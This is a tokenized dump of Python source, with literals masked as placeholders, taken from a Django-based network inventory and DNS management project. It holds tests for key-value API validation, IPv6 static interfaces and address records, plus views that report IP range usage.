get ( '<STR_LIT>' , follow = True ) <EOL> self . assertEqual ( resp . status_code , <NUM_LIT:200> ) <EOL> system_list = json . loads ( resp . content ) <EOL> self . assertEqual ( len ( system_list ) , <NUM_LIT:2> ) <EOL> self . assertEqual ( system_list [ <NUM_LIT:0> ] [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> self . assertEqual ( system_list [ <NUM_LIT:0> ] [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> self . assertEqual ( system_list [ <NUM_LIT:0> ] [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> self . assertEqual ( system_list [ <NUM_LIT:1> ] [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> self . assertEqual ( system_list [ <NUM_LIT:1> ] [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> class KeyValueApi ( TestCase ) : <EOL> fixtures = [ '<STR_LIT>' ] <EOL> def setup ( self ) : <EOL> self . client = Client ( ) <EOL> def test_get_adapters_by_system ( self ) : <EOL> resp = self . client . get ( '<STR_LIT>' , { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } , follow = True ) <EOL> def test_keyvalue_set_invalid_ip ( self ) : <EOL> resp = self . client . put ( '<STR_LIT>' , { '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:value>' : '<STR_LIT>' , '<STR_LIT:key>' : '<STR_LIT>' } ) <EOL> self . assertEqual ( resp . status_code , <NUM_LIT> ) <EOL> def test_keyvalue_set_valid_ip ( self ) : <EOL> resp = self . client . put ( '<STR_LIT>' , { '<STR_LIT>' : '<STR_LIT:1>' , '<STR_LIT:value>' : '<STR_LIT>' , '<STR_LIT:key>' : '<STR_LIT>' } ) <EOL> self . assertEqual ( resp . status_code , <NUM_LIT:200> ) <EOL> def test_keyvalue_set_invalid_mac_address ( self ) : <EOL> resp = self . client . put ( '<STR_LIT>' , { '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:value>' : '<STR_LIT>' , '<STR_LIT:key>' : '<STR_LIT>' } ) <EOL> self . assertEqual ( resp . status_code , <NUM_LIT> ) <EOL> def test_keyvalue_set_valid_mac_address ( self ) : <EOL> resp = self . client . put ( '<STR_LIT>' , { '<STR_LIT>' : '<STR_LIT:1>' , '<STR_LIT:value>' : '<STR_LIT>' , '<STR_LIT:key>' : '<STR_LIT>' } ) <EOL> self . assertEqual ( resp . status_code , <NUM_LIT:200> ) <EOL> def test_keyvalue_set_invalid_is_dhcp_scope ( self ) : <EOL> resp = self . client . put ( '<STR_LIT>' , { '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:value>' : '<STR_LIT:true>' , '<STR_LIT:key>' : '<STR_LIT>' } ) <EOL> self . assertEqual ( resp . status_code , <NUM_LIT> ) <EOL> """<STR_LIT>""" <EOL> def test_keyvalue_set_invalid_dhcp_scope_start ( self ) : <EOL> resp = self . client . put ( '<STR_LIT>' , { '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:value>' : '<STR_LIT>' , '<STR_LIT:key>' : '<STR_LIT>' } ) <EOL> self . assertEqual ( resp . status_code , <NUM_LIT> ) <EOL> """<STR_LIT>""" <EOL> def test_keyvalue_set_invalid_dhcp_scope_end ( self ) : <EOL> resp = self . client . put ( '<STR_LIT>' , { '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:value>' : '<STR_LIT>' , '<STR_LIT:key>' : '<STR_LIT>' } ) <EOL> self . assertEqual ( resp . status_code , <NUM_LIT> ) <EOL> """<STR_LIT>""" <EOL> def test_keyvalue_set_invalid_dhcp_pool_start ( self ) : <EOL> resp = self . client . put ( '<STR_LIT>' , { '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:value>' : '<STR_LIT>' , '<STR_LIT:key>' : '<STR_LIT>' } ) <EOL> self . assertEqual ( resp . status_code , <NUM_LIT> ) <EOL> """<STR_LIT>""" <EOL> def test_keyvalue_set_invalid_dhcp_pool_end ( self ) : <EOL> resp = self . client . put ( '<STR_LIT>' , { '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:value>' : '<STR_LIT>' , '<STR_LIT:key>' : '<STR_LIT>' } ) <EOL> self . assertEqual ( resp . status_code , <NUM_LIT> ) <EOL> """<STR_LIT>""" <EOL> def test_keyvalue_set_invalid_dhcp_scope_netmask ( self ) : <EOL> resp = self . client . put ( '<STR_LIT>' , { '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:value>' : '<STR_LIT>' , '<STR_LIT:key>' : '<STR_LIT>' } ) <EOL> self . assertEqual ( resp . status_code , <NUM_LIT> ) <EOL> """<STR_LIT>""" <EOL> def test_keyvalue_set_invalid_dhcp_ntp_server ( self ) : <EOL> resp = self . client . put ( '<STR_LIT>' , { '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:value>' : '<STR_LIT>' , '<STR_LIT:key>' : '<STR_LIT>' } ) <EOL> self . assertEqual ( resp . status_code , <NUM_LIT> ) <EOL> """<STR_LIT>""" </s>
<s> from django . test import TestCase <EOL> from django . core . exceptions import ValidationError <EOL> from core . interface . static_intr . models import StaticInterface <EOL> from systems . models import System <EOL> from mozdns . domain . models import Domain <EOL> from mozdns . address_record . models import AddressRecord <EOL> from mozdns . ptr . models import PTR <EOL> from mozdns . ip . utils import ip_to_domain_name <EOL> class V6StaticInterTests ( TestCase ) : <EOL> def create_domain ( self , name , ip_type = None , delegated = False ) : <EOL> if ip_type is None : <EOL> ip_type = '<STR_LIT:4>' <EOL> if name in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> pass <EOL> else : <EOL> name = ip_to_domain_name ( name , ip_type = ip_type ) <EOL> d = Domain ( name = name , delegated = delegated ) <EOL> d . clean ( ) <EOL> self . assertTrue ( d . is_reverse ) <EOL> return d <EOL> def setUp ( self ) : <EOL> self . arpa = self . create_domain ( name = '<STR_LIT>' ) <EOL> self . arpa . save ( ) <EOL> self . i_arpa = self . create_domain ( name = '<STR_LIT>' , ip_type = '<STR_LIT>' ) <EOL> self . i_arpa . save ( ) <EOL> self . c = Domain ( name = "<STR_LIT>" ) <EOL> self . c . save ( ) <EOL> self . f_c = Domain ( name = "<STR_LIT>" ) <EOL> self . f_c . save ( ) <EOL> self . r1 = self . create_domain ( name = "<STR_LIT:0>" , ip_type = '<STR_LIT>' ) <EOL> self . r1 . save ( ) <EOL> self . r2 = self . create_domain ( name = "<STR_LIT:1>" , ip_type = '<STR_LIT>' ) <EOL> self . r2 . save ( ) <EOL> self . n = System ( ) <EOL> self . n . clean ( ) <EOL> self . n . save ( ) <EOL> def do_add ( self , mac , label , domain , ip_str , ip_type = '<STR_LIT>' ) : <EOL> r = StaticInterface ( mac = mac , label = label , domain = domain , ip_str = ip_str , <EOL> ip_type = ip_type , system = self . n ) <EOL> r . clean ( ) <EOL> r . save ( ) <EOL> repr ( r ) <EOL> return r <EOL> def do_delete ( self , r ) : <EOL> ip_str = r . ip_str <EOL> fqdn = r . fqdn <EOL> r . delete ( ) <EOL> self . assertFalse ( <EOL> AddressRecord . objects . filter ( ip_str = ip_str , fqdn = fqdn ) ) <EOL> def test1_create_basic ( self ) : <EOL> mac = "<STR_LIT>" <EOL> label = "<STR_LIT:foo>" <EOL> domain = self . f_c <EOL> ip_str = "<STR_LIT>" + mac <EOL> kwargs = { '<STR_LIT>' : mac , '<STR_LIT:label>' : label , '<STR_LIT>' : domain , <EOL> '<STR_LIT>' : ip_str } <EOL> self . do_add ( ** kwargs ) <EOL> def test2_create_basic ( self ) : <EOL> mac = "<STR_LIT>" <EOL> label = "<STR_LIT>" <EOL> domain = self . f_c <EOL> ip_str = "<STR_LIT>" + mac <EOL> kwargs = { '<STR_LIT>' : mac , '<STR_LIT:label>' : label , '<STR_LIT>' : domain , <EOL> '<STR_LIT>' : ip_str } <EOL> self . do_add ( ** kwargs ) <EOL> def test3_create_basic ( self ) : <EOL> mac = "<STR_LIT>" <EOL> label = "<STR_LIT>" <EOL> domain = self . f_c <EOL> ip_str = "<STR_LIT>" + mac <EOL> kwargs = { '<STR_LIT>' : mac , '<STR_LIT:label>' : label , '<STR_LIT>' : domain , <EOL> '<STR_LIT>' : ip_str } <EOL> self . do_add ( ** kwargs ) <EOL> def test4_create_basic ( self ) : <EOL> mac = "<STR_LIT>" <EOL> label = "<STR_LIT>" <EOL> domain = self . f_c <EOL> ip_str = "<STR_LIT>" + mac <EOL> kwargs = { '<STR_LIT>' : mac , '<STR_LIT:label>' : label , '<STR_LIT>' : domain , <EOL> '<STR_LIT>' : ip_str } <EOL> self . do_add ( ** kwargs ) <EOL> def test1_delete ( self ) : <EOL> mac = "<STR_LIT>" <EOL> label = "<STR_LIT>" <EOL> domain = self . f_c <EOL> ip_str = "<STR_LIT>" + mac <EOL> kwargs = { '<STR_LIT>' : mac , '<STR_LIT:label>' : label , '<STR_LIT>' : domain , <EOL> '<STR_LIT>' : ip_str } <EOL> r = self . do_add ( ** kwargs ) <EOL> self . do_delete ( r ) <EOL> def test1_dup_create_basic ( self ) : <EOL> mac = "<STR_LIT>" <EOL> label = "<STR_LIT>" <EOL> domain = self . f_c <EOL> ip_str = "<STR_LIT>" + mac <EOL> kwargs = { '<STR_LIT>' : mac , '<STR_LIT:label>' : label , '<STR_LIT>' : domain , <EOL> '<STR_LIT>' : ip_str } <EOL> self . do_add ( ** kwargs ) <EOL> self . assertRaises ( ValidationError , self . do_add , ** kwargs ) <EOL> def test1_bad_add_for_a_ptr ( self ) : <EOL> mac = "<STR_LIT>" <EOL> label = "<STR_LIT>" <EOL> domain = self . c <EOL> ip_str = "<STR_LIT>" + mac <EOL> kwargs = { '<STR_LIT>' : mac , '<STR_LIT:label>' : label , '<STR_LIT>' : domain , <EOL> '<STR_LIT>' : ip_str } <EOL> ip_type = '<STR_LIT>' <EOL> i = self . do_add ( ** kwargs ) <EOL> i . clean ( ) <EOL> i . save ( ) <EOL> a = AddressRecord ( label = label , domain = domain , ip_str = ip_str , <EOL> ip_type = ip_type ) <EOL> self . assertRaises ( ValidationError , a . clean ) <EOL> ptr = PTR ( ip_str = ip_str , ip_type = ip_type , name = i . fqdn ) <EOL> self . assertRaises ( ValidationError , ptr . clean ) <EOL> def test2_bad_add_for_a_ptr ( self ) : <EOL> mac = "<STR_LIT>" <EOL> label = "<STR_LIT>" <EOL> domain = self . c <EOL> ip_str = "<STR_LIT>" + mac <EOL> kwargs = { '<STR_LIT>' : mac , '<STR_LIT:label>' : label , '<STR_LIT>' : domain , <EOL> '<STR_LIT>' : ip_str } <EOL> ip_type = '<STR_LIT>' <EOL> a = AddressRecord ( label = label , domain = domain , ip_str = ip_str , <EOL> ip_type = ip_type ) <EOL> a . clean ( ) <EOL> a . save ( ) <EOL> ptr = PTR ( ip_str = ip_str , ip_type = ip_type , name = a . fqdn ) <EOL> ptr . clean ( ) <EOL> ptr . save ( ) <EOL> self . assertRaises ( ValidationError , self . do_add , ** kwargs ) <EOL> def test1_bad_reverse_domain ( self ) : <EOL> mac = "<STR_LIT>" <EOL> label = "<STR_LIT>" <EOL> domain = self . f_c <EOL> ip_str = "<STR_LIT>" + mac <EOL> kwargs = { '<STR_LIT>' : mac , '<STR_LIT:label>' : label , '<STR_LIT>' : domain , <EOL> '<STR_LIT>' : ip_str } <EOL> i = self . do_add ( ** kwargs ) <EOL> i . ip_str = "<STR_LIT>" <EOL> self . assertRaises ( ValidationError , i . clean ) <EOL> def test1_no_system ( self ) : <EOL> mac = "<STR_LIT>" <EOL> label = "<STR_LIT>" <EOL> domain = self . f_c <EOL> ip_str = "<STR_LIT>" + mac <EOL> ip_type = '<STR_LIT>' <EOL> r = StaticInterface ( label = label , domain = domain , ip_str = ip_str , <EOL> ip_type = ip_type , system = None ) <EOL> self . assertRaises ( ValidationError , r . clean ) </s>
<s> from django . core . exceptions import ObjectDoesNotExist , ValidationError <EOL> from django . shortcuts import get_object_or_404 <EOL> from django . shortcuts import render <EOL> from django . http import HttpResponse <EOL> from core . utils import int_to_ip , resolve_ip_type <EOL> from core . range . forms import RangeForm <EOL> from core . range . utils import range_usage <EOL> from core . range . models import Range <EOL> from mozdns . ip . models import ipv6_to_longs <EOL> from core . views import CoreDeleteView , CoreDetailView <EOL> from core . views import CoreCreateView , CoreUpdateView , CoreListView <EOL> import ipaddr <EOL> import simplejson as json <EOL> class RangeView ( object ) : <EOL> model = Range <EOL> form_class = RangeForm <EOL> queryset = Range . objects . all ( ) <EOL> class RangeDeleteView ( RangeView , CoreDeleteView ) : <EOL> pass <EOL> class RangeCreateView ( RangeView , CoreCreateView ) : <EOL> pass <EOL> class RangeUpdateView ( RangeView , CoreUpdateView ) : <EOL> template_name = "<STR_LIT>" <EOL> class RangeListView ( RangeView , CoreListView ) : <EOL> template_name = "<STR_LIT>" <EOL> class RangeDetailView ( RangeView , CoreDetailView ) : <EOL> template_name = '<STR_LIT>' <EOL> def get_context_data ( self , ** kwargs ) : <EOL> context = super ( RangeDetailView , self ) . get_context_data ( <EOL> ** kwargs ) <EOL> context [ '<STR_LIT>' ] = "<STR_LIT>" . format ( <EOL> self . form_class . Meta . model . __name__ <EOL> ) <EOL> if self . extra_context : <EOL> context = dict ( context . items ( ) + self . extra_context . items ( ) ) <EOL> return context <EOL> def range_usage_text ( request ) : <EOL> start = request . GET . get ( '<STR_LIT:start>' , None ) <EOL> end = request . GET . get ( '<STR_LIT:end>' , None ) <EOL> format = request . GET . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> if not ( start and end ) : <EOL> return HttpResponse ( json . dumps ( { <EOL> '<STR_LIT:success>' : False , <EOL> '<STR_LIT>' : '<STR_LIT>' } ) ) <EOL> get_objects = request . GET . get ( '<STR_LIT>' , False ) <EOL> if start . find ( '<STR_LIT::>' ) > - <NUM_LIT:1> : <EOL> ip_type = '<STR_LIT>' <EOL> else : <EOL> ip_type = '<STR_LIT:4>' <EOL> try : <EOL> usage_data = range_usage ( start , end , ip_type , get_objects ) <EOL> except ( ValidationError , ipaddr . AddressValueError ) , e : <EOL> return HttpResponse ( <EOL> json . dumps ( { <EOL> '<STR_LIT>' : str ( e ) , <EOL> '<STR_LIT:success>' : False <EOL> } ) ) <EOL> if format == '<STR_LIT>' : <EOL> usage_data [ '<STR_LIT>' ] = map ( lambda x : ( int_to_ip ( x [ <NUM_LIT:0> ] , ip_type ) , <EOL> int_to_ip ( x [ <NUM_LIT:1> ] , ip_type ) ) , <EOL> usage_data [ '<STR_LIT>' ] ) <EOL> usage_data [ '<STR_LIT:success>' ] = True <EOL> return HttpResponse ( json . dumps ( usage_data ) ) <EOL> def range_usage_ajax ( request ) : <EOL> start = request . GET . get ( '<STR_LIT:start>' , None ) <EOL> end = request . GET . get ( '<STR_LIT:end>' , None ) <EOL> start_ip_type , _ = resolve_ip_type ( start ) <EOL> end_ip_type , _ = resolve_ip_type ( end ) <EOL> errors = None <EOL> if start_ip_type != end_ip_type or start_ip_type is None : <EOL> errors = "<STR_LIT>" <EOL> return render ( request , '<STR_LIT>' , { <EOL> '<STR_LIT>' : errors , <EOL> } ) <EOL> rusage = range_usage ( start , end , start_ip_type , get_objects = True ) <EOL> def translate_ip ( ip_i , * args ) : <EOL> return int_to_ip ( ip_i , start_ip_type ) <EOL> return render ( request , '<STR_LIT>' , { <EOL> '<STR_LIT>' : errors , <EOL> '<STR_LIT:start>' : start , <EOL> '<STR_LIT:end>' : end , <EOL> '<STR_LIT>' : int_to_ip ( start , start_ip_type ) , <EOL> '<STR_LIT>' : int_to_ip ( end , end_ip_type ) , <EOL> '<STR_LIT>' : rusage , <EOL> '<STR_LIT>' : translate_ip <EOL> } ) <EOL> def range_detail ( request , range_pk ) : <EOL> mrange = get_object_or_404 ( Range , pk = range_pk ) <EOL> attrs = mrange . keyvalue_set . all ( ) <EOL> return render ( request , '<STR_LIT>' , { <EOL> '<STR_LIT>' : mrange , <EOL> '<STR_LIT>' : attrs , <EOL> } ) <EOL> def redirect_to_range_from_ip ( request ) : <EOL> ip_str = request . GET . get ( '<STR_LIT>' ) <EOL> ip_type = request . GET . get ( '<STR_LIT>' ) <EOL> if not ( ip_str and ip_type ) : <EOL> return HttpResponse ( json . dumps ( { '<STR_LIT>' : "<STR_LIT>" } ) ) <EOL> if ip_type == '<STR_LIT:4>' : <EOL> try : <EOL> ip_upper , ip_lower = <NUM_LIT:0> , int ( ipaddr . IPv4Address ( ip_str ) ) <EOL> except ipaddr . AddressValueError : <EOL> return HttpResponse ( <EOL> json . dumps ( { '<STR_LIT:success>' : False , '<STR_LIT:message>' : "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" . format ( ip_str ) } ) ) <EOL> else : <EOL> try : <EOL> ip_upper , ip_lower = ipv6_to_longs ( ip_str ) <EOL> except ValidationError : <EOL> return HttpResponse ( json . dumps ( { '<STR_LIT:success>' : False , <EOL> '<STR_LIT:message>' : '<STR_LIT>' } ) ) <EOL> range_ = Range . objects . filter ( start_upper__lte = ip_upper , <EOL> start_lower__lte = ip_lower , <EOL> end_upper__gte = ip_upper , <EOL> end_lower__gte = ip_lower ) <EOL> if not len ( range_ ) == <NUM_LIT:1> : <EOL> return HttpResponse ( json . dumps ( { '<STR_LIT>' : "<STR_LIT>" } ) ) <EOL> else : <EOL> return HttpResponse ( json . dumps ( <EOL> { '<STR_LIT:success>' : True , <EOL> '<STR_LIT>' : range_ [ <NUM_LIT:0> ] . get_absolute_url ( ) } ) ) <EOL> def get_next_available_ip_by_range ( request , range_id ) : <EOL> range = get_object_or_404 ( Range , id = range_id ) <EOL> ret = { } <EOL> ret_ip = range . get_next_ip ( ) <EOL> display_ip = ret_ip . exploded <EOL> ret [ '<STR_LIT:success>' ] = True <EOL> ret [ '<STR_LIT>' ] = display_ip <EOL> return HttpResponse ( json . dumps ( ret ) ) <EOL> def get_all_ranges_ajax ( request ) : <EOL> system_pk = request . GET . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> location = None <EOL> system = None <EOL> ret_list = [ ] <EOL> from systems . models import System <EOL> try : <EOL> system = System . objects . get ( pk = system_pk ) <EOL> except ObjectDoesNotExist : <EOL> pass <EOL> if system : <EOL> try : <EOL> location = system . system_rack . location . name . title ( ) <EOL> except AttributeError : <EOL> pass <EOL> for r in Range . objects . all ( ) . order_by ( '<STR_LIT>' ) : <EOL> relevant = False <EOL> if r . network . site : <EOL> site_name = r . network . site . get_site_path ( ) <EOL> if location and location == r . network . site . name . title ( ) : <EOL> relevant = True <EOL> else : <EOL> site_name = '<STR_LIT>' <EOL> if r . network . vlan : <EOL> vlan_name = r . network . vlan . name <EOL> else : <EOL> vlan_name = '<STR_LIT>' <EOL> ret_list . append ( { '<STR_LIT:id>' : r . pk , <EOL> '<STR_LIT>' : r . choice_display ( ) , <EOL> '<STR_LIT>' : vlan_name , <EOL> '<STR_LIT>' : site_name , <EOL> '<STR_LIT>' : relevant <EOL> } ) <EOL> return HttpResponse ( json . dumps ( ret_list ) ) </s>
<s> import ipaddr <EOL> from django . core . exceptions import ValidationError <EOL> from django . db import IntegrityError <EOL> from django . test import TestCase <EOL> from mozdns . address_record . models import AddressRecord <EOL> from mozdns . domain . models import Domain <EOL> from mozdns . ip . models import ipv6_to_longs <EOL> from mozdns . nameserver . models import Nameserver <EOL> from mozdns . domain . models import boot_strap_ipv6_reverse_domain <EOL> from mozdns . ip . utils import ip_to_domain_name <EOL> from mozdns . cname . models import CNAME <EOL> class AddressRecordTests ( TestCase ) : <EOL> def create_domain ( self , name , ip_type = None , delegated = False ) : <EOL> if ip_type is None : <EOL> ip_type = '<STR_LIT:4>' <EOL> if name in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> pass <EOL> else : <EOL> name = ip_to_domain_name ( name , ip_type = ip_type ) <EOL> d = Domain ( name = name , delegated = delegated ) <EOL> d . clean ( ) <EOL> self . assertTrue ( d . is_reverse ) <EOL> return d <EOL> def setUp ( self ) : <EOL> self . arpa = self . create_domain ( name = '<STR_LIT>' ) <EOL> self . arpa . save ( ) <EOL> self . i_arpa = self . create_domain ( name = '<STR_LIT>' ) <EOL> self . i_arpa . save ( ) <EOL> self . i6_arpa = self . create_domain ( name = '<STR_LIT>' ) <EOL> self . i6_arpa . save ( ) <EOL> self . osu_block = "<STR_LIT>" <EOL> boot_strap_ipv6_reverse_domain ( "<STR_LIT>" ) <EOL> try : <EOL> self . e = Domain ( name = '<STR_LIT>' ) <EOL> self . e . save ( ) <EOL> except IntegrityError : <EOL> pass <EOL> try : <EOL> self . o_e = Domain ( name = '<STR_LIT>' ) <EOL> self . o_e . save ( ) <EOL> except IntegrityError : <EOL> self . o_e = Domain . objects . filter ( name = '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> pass <EOL> try : <EOL> self . f_o_e = Domain ( name = '<STR_LIT>' ) <EOL> self . f_o_e . save ( ) <EOL> except IntegrityError : <EOL> self . f_o_e = Domain . objects . filter ( name = '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> pass <EOL> try : <EOL> self . m_o_e = Domain ( name = '<STR_LIT>' ) <EOL> self . m_o_e . save ( ) <EOL> except IntegrityError : <EOL> self . m_o_e = Domain . objects . filter ( name = '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> pass <EOL> try : <EOL> self . z_o_e = Domain ( name = '<STR_LIT>' ) <EOL> self . z_o_e . save ( ) <EOL> except IntegrityError : <EOL> self . z_o_e = Domain . objects . filter ( name = '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> pass <EOL> try : <EOL> self . g_o_e = Domain ( name = '<STR_LIT>' ) <EOL> self . g_o_e . save ( ) <EOL> except IntegrityError : <EOL> self . g_o_e = Domain . objects . filter ( <EOL> name = '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> pass <EOL> try : <EOL> self . _128 = self . create_domain ( name = '<STR_LIT>' ) <EOL> self . _128 . save ( ) <EOL> except IntegrityError : <EOL> raise Exception <EOL> self . _128 = self . create_domain . objects . filter ( name = '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> pass <EOL> try : <EOL> self . _128_193 = self . create_domain ( name = '<STR_LIT>' ) <EOL> self . _128_193 . save ( ) <EOL> except IntegrityError : <EOL> raise Exception <EOL> self . _128_193 = Domain . objects . filter ( name = '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> pass <EOL> def test_invalid_update_to_existing ( self ) : <EOL> rec1 = AddressRecord ( label = '<STR_LIT:bar>' , domain = self . z_o_e , <EOL> ip_str = "<STR_LIT>" , ip_type = '<STR_LIT:4>' ) <EOL> rec2 = AddressRecord ( label = '<STR_LIT:bar>' , domain = self . z_o_e , <EOL> ip_str = "<STR_LIT>" , ip_type = '<STR_LIT:4>' ) <EOL> rec3 = AddressRecord ( label = '<STR_LIT:foo>' , domain = self . z_o_e , <EOL> ip_str = "<STR_LIT>" , ip_type = '<STR_LIT:4>' ) <EOL> rec3 . save ( ) <EOL> rec2 . save ( ) <EOL> rec1 . save ( ) <EOL> rec1 . label = "<STR_LIT:foo>" <EOL> self . assertRaises ( ValidationError , rec1 . save ) <EOL> rec3 . label = "<STR_LIT:bar>" <EOL> self . assertRaises ( ValidationError , rec3 . save ) <EOL> osu_block = "<STR_LIT>" <EOL> rec1 = AddressRecord ( label = '<STR_LIT:bar>' , domain = self . z_o_e , <EOL> ip_str = osu_block + "<STR_LIT>" , ip_type = '<STR_LIT>' ) <EOL> rec2 = AddressRecord ( label = '<STR_LIT:bar>' , domain = self . z_o_e , <EOL> ip_str = osu_block + "<STR_LIT>" , ip_type = '<STR_LIT>' ) <EOL> rec3 = AddressRecord ( label = '<STR_LIT:foo>' , domain = self . z_o_e , <EOL> ip_str = osu_block + "<STR_LIT>" , ip_type = '<STR_LIT>' ) <EOL> rec1 . save ( ) <EOL> rec2 . save ( ) <EOL> rec3 . save ( ) <EOL> rec2 . ip_str = osu_block + "<STR_LIT>" <EOL> self . assertRaises ( ValidationError , rec2 . save ) <EOL> rec3 . label = '<STR_LIT:bar>' <EOL> self . assertRaises ( ValidationError , rec3 . save ) <EOL> """<STR_LIT>""" <EOL> def _do_generic_update_test ( self , record , new_name , new_ip , ip_type ) : <EOL> if new_ip : <EOL> if ip_type == '<STR_LIT:4>' : <EOL> ip_upper , ip_lower = <NUM_LIT:0> , ipaddr . IPv4Address ( new_ip ) . __int__ ( ) <EOL> else : <EOL> ip_upper , ip_lower = ipv6_to_longs ( new_ip ) <EOL> else : <EOL> ip_upper , ip_lower = record . ip_upper , record . ip_lower <EOL> if new_name is not None and new_ip is not None : <EOL> aret = AddressRecord . objects . filter ( <EOL> label = new_name , ip_upper = ip_upper , <EOL> ip_lower = ip_lower , ip_type = ip_type ) [ <NUM_LIT:0> ] <EOL> elif new_name is not None : <EOL> aret = AddressRecord . objects . filter ( <EOL> label = new_name , ip_upper = ip_upper , <EOL> ip_lower = ip_lower , ip_type = ip_type ) [ <NUM_LIT:0> ] <EOL> else : <EOL> aret = AddressRecord . objects . filter ( <EOL> label = new_name , ip_upper = ip_upper , <EOL> ip_lower = ip_lower , ip_type = ip_type ) [ <NUM_LIT:0> ] <EOL> if new_name : <EOL> self . assertEqual ( aret . label , new_name ) <EOL> if new_ip : <EOL> if ip_type == '<STR_LIT:4>' : <EOL> self . assertEqual ( <EOL> aret . ip_str , ipaddr . IPv4Address ( new_ip ) . __str__ ( ) ) <EOL> else : <EOL> self . assertEqual ( <EOL> aret . ip_str , ipaddr . IPv6Address ( new_ip ) . __str__ ( ) ) <EOL> def do_update_A_record ( self , record , new_name , new_ip ) : <EOL> if new_name is not None : <EOL> record . label = new_name <EOL> if new_ip is not None : <EOL> record . ip_str = new_ip <EOL> record . save ( ) <EOL> self . _do_generic_update_test ( record , new_name , new_ip , '<STR_LIT:4>' ) <EOL> def do_update_AAAA_record ( self , record , new_name , new_ip ) : <EOL> if new_name is not None : <EOL> record . label = new_name <EOL> if new_ip is not None : <EOL> record . ip_str = new_ip <EOL> record . save ( ) <EOL> self . _do_generic_update_test ( record , new_name , new_ip , '<STR_LIT>' ) <EOL> def test_update_A_record ( self ) : <EOL> rec0 = AddressRecord ( label = '<STR_LIT>' , domain = self . m_o_e , <EOL> ip_str = "<STR_LIT>" , ip_type = '<STR_LIT:4>' ) <EOL> rec0 . save ( ) <EOL> rec1 = AddressRecord ( label = '<STR_LIT:foo>' , domain = self . m_o_e , <EOL> ip_str = "<STR_LIT>" , ip_type = '<STR_LIT:4>' ) <EOL> rec1 . save ( ) <EOL> rec2 = AddressRecord ( label = '<STR_LIT:bar>' , domain = self . m_o_e , <EOL> ip_str = "<STR_LIT>" , ip_type = '<STR_LIT:4>' ) <EOL> rec2 . save ( ) <EOL> rec3 = AddressRecord ( label = '<STR_LIT>' <EOL> '<STR_LIT>' , domain = self . m_o_e , <EOL> ip_str = "<STR_LIT>" , ip_type = '<STR_LIT:4>' ) <EOL> rec3 . save ( ) <EOL> self . do_update_A_record ( rec0 , "<STR_LIT>" , "<STR_LIT>" ) <EOL> self . do_update_A_record ( rec1 , "<STR_LIT>" , <EOL> "<STR_LIT>" ) <EOL> self . do_update_A_record ( rec2 , "<STR_LIT>" , <EOL> "<STR_LIT>" ) <EOL> self . do_update_A_record ( rec3 , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ) <EOL> self . do_update_A_record ( rec0 , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ) <EOL> self . do_update_A_record ( rec1 , "<STR_LIT:w>" , "<STR_LIT>" ) <EOL> self . do_update_A_record ( rec0 , '<STR_LIT>' , "<STR_LIT>" ) <EOL> self . do_update_A_record ( rec1 , "<STR_LIT>" , None ) <EOL> def test_update_AAAA_record ( self ) : <EOL> boot_strap_ipv6_reverse_domain ( "<STR_LIT>" ) <EOL> osu_block = "<STR_LIT>" <EOL> rec0 = AddressRecord ( label = '<STR_LIT>' , domain = self . z_o_e , ip_str = osu_block + <EOL> "<STR_LIT>" , ip_type = '<STR_LIT>' ) <EOL> rec1 = AddressRecord ( label = '<STR_LIT:foo>' , domain = self . z_o_e , <EOL> ip_str = osu_block + "<STR_LIT>" , ip_type = '<STR_LIT>' ) <EOL> rec2 = AddressRecord ( label = '<STR_LIT:bar>' , domain = self . z_o_e , <EOL> ip_str = osu_block + "<STR_LIT>" , ip_type = '<STR_LIT>' ) <EOL> self . do_update_AAAA_record ( rec0 , "<STR_LIT>" , <EOL> osu_block + "<STR_LIT>" ) <EOL> self . do_update_AAAA_record ( rec1 , "<STR_LIT>" , <EOL> osu_block + "<STR_LIT>" ) <EOL> self . do_update_AAAA_record ( rec2 , "<STR_LIT>" , <EOL> osu_block + "<STR_LIT>" ) <EOL> self . do_update_AAAA_record ( rec0 , "<STR_LIT>" , osu_block + "<STR_LIT>" ) <EOL> self . do_update_AAAA_record ( rec0 , "<STR_LIT>" , <EOL> osu_block + "<STR_LIT>" ) <EOL> self . do_update_AAAA_record ( rec1 , "<STR_LIT>" , osu_block + "<STR_LIT>" ) <EOL> self . do_update_AAAA_record ( rec1 , "<STR_LIT>" , <EOL> osu_block + "<STR_LIT>" ) <EOL> self . do_update_AAAA_record ( rec2 , "<STR_LIT>" , <EOL> osu_block + "<STR_LIT::>" ) <EOL> self . do_update_AAAA_record ( rec1 , "<STR_LIT>" , osu_block + "<STR_LIT>" ) <EOL> self . do_update_AAAA_record ( rec1 , "<STR_LIT>" , osu_block + "<STR_LIT>" ) <EOL> def test_update_invalid_ip_A_record ( self ) : <EOL> rec0 = AddressRecord ( label = '<STR_LIT>' , domain = self . m_o_e , <EOL> ip_str = "<STR_LIT>" , ip_type = '<STR_LIT:4>' ) <EOL> rec1 = AddressRecord ( label = '<STR_LIT:foo>' , domain = self 